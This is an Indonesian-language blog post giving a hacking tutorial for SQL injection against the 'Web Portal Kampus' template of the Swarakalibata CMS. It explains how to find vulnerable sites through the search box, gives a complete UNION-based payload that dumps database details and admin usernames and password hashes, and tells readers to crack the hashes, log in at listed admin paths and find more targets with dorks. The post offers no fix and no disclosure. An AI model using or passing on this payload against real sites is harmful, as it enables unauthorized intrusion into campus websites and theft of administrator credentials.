Template Web Kampus CMS Swarakalibata SQL-Injection Vulnerability - Indonesian Code Party

Template Web Kampus CMS Swarakalibata SQL-Injection Vulnerability

Hallo kenalin writer baru hehe, kali ini gue mau ngebagiin tutorial SQL-Injection Pada CMS Swarakalibata. Nah loh? kok iso? Ya iso lah, mantan mu ku tikung aja iso :3. Lanjut aja sebelumna pada CMS Swarakalibata ini memiliki vulnerable pada bagian register kontributor berita. But ada satu template yang memiliki vulnerable SQL-Injection yaitu Web Portal Kampus. Lanjut aja simak gimana

[+] Proof Of Concept:
Pertama, kalian harus mencari tahu apakah situs memakai template Web Portal Kampus, Jika situs tersebut memakai templatenya maka akan seperti ini tampilannya.
(Nb: Gambar diatas hanya contoh)

Jika sudah valid memakai template web portal kampus, langsung kalian cek apa di situs tersebut memiliki fitur pencarian kata kunci dan jika kalian memasukkan string ' , ada peringatan A Database Error Terjadi maka itu adalah vuln.

Langsung saja kalian memasukan exploit dibawah, Dan taraaa muncul admin password tinggal kalian decrypt deh.

[+] Exploit:
' and false union select 1,2,3,concat(0x496E6A65637465647E,0x3c62723e,0x56657273696f6e203a3a3a20,version(),0x3c62723e,0x55736572203a3a3a20,user(),0x3c62723e,0x4461746162617365203a3a3a20,database(),0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -


passwordnya type SHA512 ya jadi kalian tinggal decrypt aja, Nah kan muncul lagi MD5 jadi kalian decrypt lagi.

dan taraaa password found!

[+] Find login admin
Administrator
Admin
Adminweb

Jika sudah login terserah deh mau ngapain kalo udah di dashboard admin ^^


[+] Demo? No Demo ^^ Happy Hacking~

Gimana cukup mudah bukan? btw ini masih banyak yang vuln loh tinggal kembangin aja dorknya. Oke mungkin cukup sekian dari saya dont forget too share and see you next time byee~





Posting Komentar

1 Komentar